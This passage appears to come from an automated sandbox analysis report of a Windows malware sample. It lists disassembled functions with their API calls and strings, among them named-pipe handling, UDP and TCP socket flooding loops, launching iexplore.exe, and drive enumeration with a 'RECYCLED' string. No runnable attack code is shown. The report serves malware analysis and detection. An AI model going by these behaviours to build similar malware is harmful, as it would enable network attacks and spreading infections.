                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403EF3
                                                                  • DisconnectNamedPipe.KERNEL32(?,?,?,00000000,000000FF,?,?), ref: 00403F68
                                                                  • ConnectNamedPipe.KERNEL32(?,?,?,?,00000000,000000FF,?,?), ref: 00403F7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileNamedPipeRead$ConnectDisconnectMultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 4113577031-0
                                                                  • Opcode ID: 2dd0d3f7e6905856f8620d5e3fef185a33115fdb9533bf0cb694795480849065
                                                                  • Instruction ID: ac3e6ea8bc8c8074bcac9458f0b4c946774cbfc70c0eded63f488d96161438d0
                                                                  • Opcode Fuzzy Hash: 2dd0d3f7e6905856f8620d5e3fef185a33115fdb9533bf0cb694795480849065
                                                                  • Instruction Fuzzy Hash: D691C3B5604219AFE714CF28D8C4FAA7BB8FF49305F004279E94597390C775EA51CBA4
                                                                  Function 00363C90 Relevance: 16.7, APIs: 11, Instructions: 227filepipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00363DA4
                                                                  • ReadFile.KERNEL32(?,-00377960,00000800,00000000), ref: 00363DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363E3E
                                                                  • ReadFile.KERNEL32(?,00377960,00000800,00000000,?), ref: 00363ED7
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363EF3
                                                                  • DisconnectNamedPipe.KERNEL32(?,?,?,00000000,000000FF,?,?), ref: 00363F68
                                                                  • ConnectNamedPipe.KERNEL32(?,?,?,?,00000000,000000FF,?,?), ref: 00363F7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileNamedPipeRead$ConnectDisconnectMultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 4113577031-0
                                                                  • Opcode ID: 13729cccae5160afc9bfa834f0673ea7e26067e33fb3ddb35eaef54f0c8a3106
                                                                  • Instruction ID: b35d7ad920049315a3256b279f868ab1d83dc53264884056662cd4de0844e855
                                                                  • Opcode Fuzzy Hash: 13729cccae5160afc9bfa834f0673ea7e26067e33fb3ddb35eaef54f0c8a3106
                                                                  • Instruction Fuzzy Hash: BB91D4B5604215AFC726DF5CDCC4FAA77A8FB49304F408259E909CB388D772EA41CBA0
                                                                  Function 00409080 Relevance: 16.6, APIs: 2, Strings: 9, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 004090A0
                                                                    • Part of subcall function 0040A0F0: wcsrchr.MSVCRT ref: 0040A0FA
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000208), ref: 00409101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememsetwcsrchr
                                                                  • String ID: %s.Blocked possible browser exploit pack call on URL '%s'$com$exe$firefox.exe$http$iexplore.exe$pdef$pif$scr
                                                                  • API String ID: 519477765-3787805686
                                                                  • Opcode ID: d63373c43e93acd40a58360cc368328db4f21044a5a5c392e3fcfcbe6f0d8047
                                                                  • Instruction ID: efd4538f4b4db184858f8da92d63e99c1f835ee883837e794a8278ba3a2532b2
                                                                  • Opcode Fuzzy Hash: d63373c43e93acd40a58360cc368328db4f21044a5a5c392e3fcfcbe6f0d8047
                                                                  • Instruction Fuzzy Hash: 3C31E6B5A443056AEB20DB519C0AFE7376C9B10345F00426AFD14A62D3E679ED50C6AA
                                                                  Function 00369080 Relevance: 16.6, APIs: 2, Strings: 9, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003690A0
                                                                    • Part of subcall function 0036A0F0: wcsrchr.MSVCRT ref: 0036A0FA
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000208), ref: 00369101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememsetwcsrchr
                                                                  • String ID: %s.Blocked possible browser exploit pack call on URL '%s'$com$exe$firefox.exe$http$iexplore.exe$pdef$pif$scr
                                                                  • API String ID: 519477765-3787805686
                                                                  • Opcode ID: cce7681bd09bf4d39f9e32cc1242c6fdb04cc5b25c684b1f881c2523c8118ed8
                                                                  • Instruction ID: b5c5d657899c89f0d11024c0f10c7e29f259c4a6a105360d39edfa05535f98b5
                                                                  • Opcode Fuzzy Hash: cce7681bd09bf4d39f9e32cc1242c6fdb04cc5b25c684b1f881c2523c8118ed8
                                                                  • Instruction Fuzzy Hash: BB31F4B6A403096BEF22DF549C0AFE7376C9B16340F05C155FC18AA256EB71DD50CBA2
                                                                  Function 0040B160 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 69stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00406E9C,00000000,00000000,00000000,?,?,00406E9C), ref: 0040B178
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,00406E9C), ref: 0040B186
                                                                  • lstrlenA.KERNEL32(00406E9C,?,?,00406E9C), ref: 0040B18F
                                                                  • strstr.MSVCRT ref: 0040B19F
                                                                  • strstr.MSVCRT ref: 0040B1B6
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00406E9C), ref: 0040B1C3
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,00406E9C), ref: 0040B1D2
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00406E9C), ref: 0040B1DC
                                                                  • lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,00406E9C), ref: 0040B1E5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040B1F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Allocstrstr$Freelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 1314289781-2344752452
                                                                  • Opcode ID: 671df700651087db9f68e88acf1a80bfe8468f7de7138985c6537d20367a1117
                                                                  • Instruction ID: 0c7384581528d42b7d5f36e6acbd12e0b896a5cfd03da8e96f22c4e7025091be
                                                                  • Opcode Fuzzy Hash: 671df700651087db9f68e88acf1a80bfe8468f7de7138985c6537d20367a1117
                                                                  • Instruction Fuzzy Hash: 4C1177769413147BD710ABA59C45FDB7BACDF49751F004426FB04E3251DAB8ED0087E8
                                                                  Function 0036B160 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 69stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00366E9C,00000000,00000000,00000000,?,?,00366E9C), ref: 0036B178
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,00366E9C), ref: 0036B186
                                                                  • lstrlenA.KERNEL32(00366E9C,?,?,00366E9C), ref: 0036B18F
                                                                  • strstr.MSVCRT ref: 0036B19F
                                                                  • strstr.MSVCRT ref: 0036B1B6
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00366E9C), ref: 0036B1C3
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,00366E9C), ref: 0036B1D2
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00366E9C), ref: 0036B1DC
                                                                  • lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,00366E9C), ref: 0036B1E5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036B1F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Allocstrstr$Freelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 1314289781-2344752452
                                                                  • Opcode ID: 4191f2ac0b2166b31aae8b3b3a7fd20e71b068e549d1eed2e517c8497cc940b4
                                                                  • Instruction ID: 704c44042745152df8a9624c20fa53f0e221637ffef6c49c89795392149b719b
                                                                  • Opcode Fuzzy Hash: 4191f2ac0b2166b31aae8b3b3a7fd20e71b068e549d1eed2e517c8497cc940b4
                                                                  • Instruction Fuzzy Hash: E8118673A01714BBD722ABA99C46F9B77ACEF45711F418015FA08E7211DAB5ED408BF0
                                                                  Function 0040AC00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82memorynetworkstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 0040AC1A
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 0040AC3E
                                                                  • GetLastError.KERNEL32 ref: 0040AC44
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 0040AC5E
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 0040AC79
                                                                  • lstrcmpW.KERNEL32(POST,00000000), ref: 0040AC85
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040AC99
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040ACB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFreeHttpInfoQuery$ErrorLastlstrcmp
                                                                  • String ID: POST
                                                                  • API String ID: 770645459-1814004025
                                                                  • Opcode ID: fdf47e3c856405845c85ea16ba9a9e54b5ee40ff6769a125eeb271a545ff0a5a
                                                                  • Instruction ID: 0fbffbe8e505b5e8b43b1d96c34f4003dc7e44b5e0767985707ba2deb4e71632
                                                                  • Opcode Fuzzy Hash: fdf47e3c856405845c85ea16ba9a9e54b5ee40ff6769a125eeb271a545ff0a5a
                                                                  • Instruction Fuzzy Hash: AF218135645214BBE7209BA5AC88EEBBB7CEB89750F10816AFA04E2250D6349D10C7A9
                                                                  Function 0036AC00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82memorynetworkstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 0036AC1A
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 0036AC3E
                                                                  • GetLastError.KERNEL32 ref: 0036AC44
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 0036AC5E
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 0036AC79
                                                                  • lstrcmpW.KERNEL32(POST,00000000), ref: 0036AC85
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036AC99
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036ACB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFreeHttpInfoQuery$ErrorLastlstrcmp
                                                                  • String ID: POST
                                                                  • API String ID: 770645459-1814004025
                                                                  • Opcode ID: 42719650952d1c5b3ec1b9b75da3c7ed4793b915d4511d705e135b089cc0a38d
                                                                  • Instruction ID: d74b75702e63f394400908105716eb3b04e64d29b4a4c9766a2848d998bcd1ca
                                                                  • Opcode Fuzzy Hash: 42719650952d1c5b3ec1b9b75da3c7ed4793b915d4511d705e135b089cc0a38d
                                                                  • Instruction Fuzzy Hash: 87219037600614BBD7329BA9AC88FAB7B7CEB85760F508159FA08E6144E7319D40DBA1
                                                                  Function 0040A690 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 79processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040A6AF
                                                                  • memset.MSVCRT ref: 0040A6CA
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000), ref: 0040A6DF
                                                                  • PathAppendW.SHLWAPI(?,Internet Explorer\iexplore.exe), ref: 0040A6F9
                                                                  • _snwprintf.MSVCRT ref: 0040A71B
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000010,00000000,00000000,00000044,?), ref: 0040A77F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Pathmemset$AppendCreateFolderProcessSpecial_snwprintf
                                                                  • String ID: "%s" %S$D$Internet Explorer\iexplore.exe
                                                                  • API String ID: 1165436438-694066683
                                                                  • Opcode ID: 7c311cd766287787cc353367e30ac3adf64e14ce37b34e93587ffb04f9e33c4c
                                                                  • Instruction ID: 04848a9af665ce3946de5b24cb2a47d1feeda1f9a2b65442b6e860eb45006ae4
                                                                  • Opcode Fuzzy Hash: 7c311cd766287787cc353367e30ac3adf64e14ce37b34e93587ffb04f9e33c4c
                                                                  • Instruction Fuzzy Hash: 4421A971940308BAEB10DBA0CC46FEA7378AF44B01F148599B7097A1C1EBF59A448B9D
                                                                  Function 0036A690 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 79processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036A6AF
                                                                  • memset.MSVCRT ref: 0036A6CA
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000), ref: 0036A6DF
                                                                  • PathAppendW.SHLWAPI(?,Internet Explorer\iexplore.exe), ref: 0036A6F9
                                                                  • _snwprintf.MSVCRT ref: 0036A71B
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000010,00000000,00000000,00000044,?), ref: 0036A77F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Pathmemset$AppendCreateFolderProcessSpecial_snwprintf
                                                                  • String ID: "%s" %S$D$Internet Explorer\iexplore.exe
                                                                  • API String ID: 1165436438-694066683
                                                                  • Opcode ID: c98ce7dea8699a97b506d06e443fbdddb459a3ea34e0a62f6c12a9503064a603
                                                                  • Instruction ID: 3f893e18f3ac200f27952f9a7e7c50f42e1c815cf087f430c93f1d89192318cb
                                                                  • Opcode Fuzzy Hash: c98ce7dea8699a97b506d06e443fbdddb459a3ea34e0a62f6c12a9503064a603
                                                                  • Instruction Fuzzy Hash: AE218B71944308BAEB25DBE0CC46FEA7378AF44B01F148588F60D7A1C5EBB59A448B99
                                                                  Function 00409430 Relevance: 15.1, APIs: 10, Instructions: 109networksleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00409300: inet_addr.WS2_32(n"@), ref: 00409308
                                                                    • Part of subcall function 00409300: gethostbyname.WS2_32(n"@), ref: 00409313
                                                                  • GetTickCount.KERNEL32 ref: 00409467
                                                                  • htons.WS2_32(?), ref: 00409490
                                                                  • GetTickCount.KERNEL32(?), ref: 004094BD
                                                                  • GetTickCount.KERNEL32 ref: 004094C1
                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 004094F6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00409511
                                                                  • sendto.WS2_32(?,?,00001964,00000000,00000002,00000010), ref: 0040953C
                                                                  • Sleep.KERNEL32(00000064,00000002,00000002,00000011), ref: 00409549
                                                                  • closesocket.WS2_32(?), ref: 00409559
                                                                  • GetTickCount.KERNEL32(?), ref: 00409564
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleepclosesocketgethostbynamehtonsinet_addrioctlsocketsendtosocket
                                                                  • String ID:
                                                                  • API String ID: 2400900511-0
                                                                  • Opcode ID: 08cdf173da6e0b52d7b4d90e9b8344553a2d1643b6037e8e8fd29483bb7c0b4b
                                                                  • Instruction ID: a87c336d0ea31640531df1928f9ed9f7433797ef1bdd0e7b1cbf387240af0400
                                                                  • Opcode Fuzzy Hash: 08cdf173da6e0b52d7b4d90e9b8344553a2d1643b6037e8e8fd29483bb7c0b4b
                                                                  • Instruction Fuzzy Hash: B93130729002246BD710BBFB8D46BEEB2999F88308F11453BF905F71D2D5B89D41C7AA
                                                                  Function 00369430 Relevance: 15.1, APIs: 10, Instructions: 109networksleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00369300: inet_addr.WS2_32(n"6), ref: 00369308
                                                                    • Part of subcall function 00369300: gethostbyname.WS2_32(n"6), ref: 00369313
                                                                  • GetTickCount.KERNEL32 ref: 00369467
                                                                  • htons.WS2_32(?), ref: 00369490
                                                                  • GetTickCount.KERNEL32(?), ref: 003694BD
                                                                  • GetTickCount.KERNEL32 ref: 003694C1
                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 003694F6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00369511
                                                                  • sendto.WS2_32(?,?,00001964,00000000,00000002,00000010), ref: 0036953C
                                                                  • Sleep.KERNEL32(00000064,00000002,00000002,00000011), ref: 00369549
                                                                  • closesocket.WS2_32(?), ref: 00369559
                                                                  • GetTickCount.KERNEL32(?), ref: 00369564
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleepclosesocketgethostbynamehtonsinet_addrioctlsocketsendtosocket
                                                                  • String ID:
                                                                  • API String ID: 2400900511-0
                                                                  • Opcode ID: 2d0bb29160b7f58d1b29a98609f763881beb4d39e599d32d7956cc4d729ee439
                                                                  • Instruction ID: 60da4290a813544fe6969eecd173f6694a608e44394a2b10f08b58f30aae1963
                                                                  • Opcode Fuzzy Hash: 2d0bb29160b7f58d1b29a98609f763881beb4d39e599d32d7956cc4d729ee439
                                                                  • Instruction Fuzzy Hash: 8B313D729001249BD722EBF98C46BBEB39D9F88304F528536FA49EB185D9B48D01C7A1
                                                                  Function 0040ACD0 Relevance: 15.1, APIs: 10, Instructions: 107memorynetworkstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040ACF5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 0040AD0A
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 0040AD2B
                                                                  • GetLastError.KERNEL32 ref: 0040AD31
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 0040AD4F
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 0040AD63
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 0040AD80
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AD93
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0040ADB3
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040ADE6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocInternetOptionQuery$??2@ByteCharErrorFreeLastMultiWidelstrcpymemset
                                                                  • String ID:
                                                                  • API String ID: 3155763378-0
                                                                  • Opcode ID: f8d406ff39b3867032f2cbca4d285a4a1005a8dcd899ed6f5777e548e8282404
                                                                  • Instruction ID: 00504cc4e49c33e4c2d117f02b4e2dde52e53599f86eef1a5ae60fdc04d2353b
                                                                  • Opcode Fuzzy Hash: f8d406ff39b3867032f2cbca4d285a4a1005a8dcd899ed6f5777e548e8282404
                                                                  • Instruction Fuzzy Hash: 42317C74500305BBD7209B95CC85FEBBBB9EF8A711F108165FA04AB2D0D7B49D40CBA9
                                                                  Function 0036ACD0 Relevance: 15.1, APIs: 10, Instructions: 107memorynetworkstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036ACF5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 0036AD0A
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 0036AD2B
                                                                  • GetLastError.KERNEL32 ref: 0036AD31
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 0036AD4F
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 0036AD63
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 0036AD80
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0036AD93
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0036ADB3
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036ADE6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocInternetOptionQuery$??2@ByteCharErrorFreeLastMultiWidelstrcpymemset
                                                                  • String ID:
                                                                  • API String ID: 3155763378-0
                                                                  • Opcode ID: 74af3b2a445bc6e2730f105fdb887c05632e6bd98fc9b47930d7131c237281e2
                                                                  • Instruction ID: 88d9285c98d00897fb8f9878a1599598a7f0b58bc134a515192ad101ac2e1d6a
                                                                  • Opcode Fuzzy Hash: 74af3b2a445bc6e2730f105fdb887c05632e6bd98fc9b47930d7131c237281e2
                                                                  • Instruction Fuzzy Hash: 8E318075500614BBD722DB99CC85FABBBBCEF86711F508144FA09AB284D7B0AD40CFA1
                                                                  Function 00409330 Relevance: 15.1, APIs: 10, Instructions: 81networksleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00409300: inet_addr.WS2_32(n"@), ref: 00409308
                                                                    • Part of subcall function 00409300: gethostbyname.WS2_32(n"@), ref: 00409313
                                                                  • htons.WS2_32(?), ref: 0040935D
                                                                  • GetTickCount.KERNEL32(?), ref: 0040936F
                                                                  • GetTickCount.KERNEL32 ref: 00409373
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004093A6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 004093C1
                                                                  • connect.WS2_32(?,?,00000010), ref: 004093DE
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 004093EB
                                                                  • closesocket.WS2_32(?), ref: 004093F8
                                                                  • Sleep.KERNEL32(0000004B,?), ref: 00409405
                                                                  • GetTickCount.KERNEL32 ref: 00409407
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleep$closesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 1090714710-0
                                                                  • Opcode ID: de3095b561cd0ee4a074b4b2388ced171c2f3cf8f2c1d860a68ce1fb6dd27ffa
                                                                  • Instruction ID: d2cec284f92f2c482fe6d1749ee7125162ceb74f25a5afa3c33734025d3d2087
                                                                  • Opcode Fuzzy Hash: de3095b561cd0ee4a074b4b2388ced171c2f3cf8f2c1d860a68ce1fb6dd27ffa
                                                                  • Instruction Fuzzy Hash: 90210872800224ABC720FBB9DD45BCEF769DB88304F01462AF908F72D1D6B49D81CB99
                                                                  Function 00369330 Relevance: 15.1, APIs: 10, Instructions: 81networksleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00369300: inet_addr.WS2_32(n"6), ref: 00369308
                                                                    • Part of subcall function 00369300: gethostbyname.WS2_32(n"6), ref: 00369313
                                                                  • htons.WS2_32(?), ref: 0036935D
                                                                  • GetTickCount.KERNEL32(?), ref: 0036936F
                                                                  • GetTickCount.KERNEL32 ref: 00369373
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 003693A6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 003693C1
                                                                  • connect.WS2_32(?,?,00000010), ref: 003693DE
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 003693EB
                                                                  • closesocket.WS2_32(?), ref: 003693F8
                                                                  • Sleep.KERNEL32(0000004B,?), ref: 00369405
                                                                  • GetTickCount.KERNEL32 ref: 00369407
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleep$closesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 1090714710-0
                                                                  • Opcode ID: 28009f9c97aba0445a8354ef7f30ad8305f256150ea8f071ea275ea418510cfe
                                                                  • Instruction ID: a6f5bb31eab11e8b71ba245a515787df8581fc6b62c7c976c5847162294eb4f6
                                                                  • Opcode Fuzzy Hash: 28009f9c97aba0445a8354ef7f30ad8305f256150ea8f071ea275ea418510cfe
                                                                  • Instruction Fuzzy Hash: 4B210872900224ABC722FBB89D45B9EB76D9B84310F128616F90CEB284D6B49D41CBD1
                                                                  Function 0040FC90 Relevance: 15.1, APIs: 7, Strings: 3, Instructions: 57stringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040FCB0
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0040FCBD
                                                                  • _snprintf.MSVCRT ref: 0040FCE0
                                                                  • lstrcpyW.KERNEL32(0044B9A0,0044ADA0), ref: 0040FCF2
                                                                  • lstrcpyA.KERNEL32(0044BDB0,RECYCLED), ref: 0040FD08
                                                                  • lstrcpyA.KERNEL32(0044BEB4,?), ref: 0040FD16
                                                                    • Part of subcall function 0040F9E0: memset.MSVCRT ref: 0040F9FF
                                                                    • Part of subcall function 0040F9E0: GetLogicalDriveStringsA.KERNEL32 ref: 0040FA22
                                                                    • Part of subcall function 0040F9E0: lstrcatA.KERNEL32(00000000,00413040), ref: 0040FA5C
                                                                  • Sleep.KERNEL32(00003A98), ref: 0040FD61
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
